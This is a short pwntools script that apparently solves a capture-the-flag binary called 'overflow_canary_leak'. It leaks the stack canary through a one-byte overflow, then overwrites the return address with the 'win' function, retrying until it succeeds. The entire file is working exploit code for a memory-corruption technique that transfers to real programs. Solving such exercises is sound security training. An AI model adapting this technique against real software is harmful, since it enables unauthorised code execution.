from pwn import * filename = './overflow_canary_leak' elf = ELF(filename) def run_once(): p = process(filename) ### Between the start of the buffer and the canary data = b'a'*0x18 data += b'c'*1 ## overflow 1 byte of canary for null byte p.readuntil(b'dataz: ') p.send(data) p.readuntil(b'said: ') p.readuntil(data) canary = u64(b'\x00' + p.read(7)) print(hex(canary)) p.readuntil(b'dataz: ') data = b'a'*0x18 data += p64(canary) data += b'c'*8 ## saved rbp data += p16(elf.symbols['win']) p.send(data) try: print(p.readuntil(b'you win')) return 1 except: return 0 while run_once() == 0: continue